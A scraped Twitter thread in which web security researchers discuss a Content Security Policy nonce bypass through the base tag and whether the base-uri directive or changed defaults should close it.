OTOH base data: is a quirk, now a CSP bypass noone would cry if we disallow this.
-
-
yes but even if data: is dissallowed the problem is not gone.
2 replies 0 retweets 0 likes -
Replying to @slekies
: Right, but, you know. Welcome to the internet we built together. ;) Opt-out via ‘base-src’?
@kkotowicz@cramforce2 replies 0 retweets 1 like -
I don't even :)
1 reply 0 retweets 0 likes -
Replying to @kkotowicz
: ‘base-uri’, sorry. https://w3c.github.io/webappsec-csp/#directive-base-uri …
@slekies@cramforce1 reply 0 retweets 1 like -
hm. So wouldnt just adding base-uri be a fix to the nonce bypass via base?
1 reply 0 retweets 1 like -
Replying to @kkotowicz
: Yes. It’s just ugly and maybe we can change our defaults to make it unnecessary to think about.
@slekies@cramforce2 replies 0 retweets 1 like -
why is default-src not working for base-uri? The PoC works even with default-src none
2 replies 0 retweets 0 likes -
Replying to @slekies
: In hindsight, I should have added more detailed metrics than I did. I’ll do that next week. :)
@kkotowicz@cramforce1 reply 0 retweets 0 likes -
base-uri 'none' works, but base-uri 'self' still allows bypasses via path-based open redirectors
1 reply 0 retweets 1 like
I like the proposal to disallow data: and expect sites which use nonces to set a sane base-uri.
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.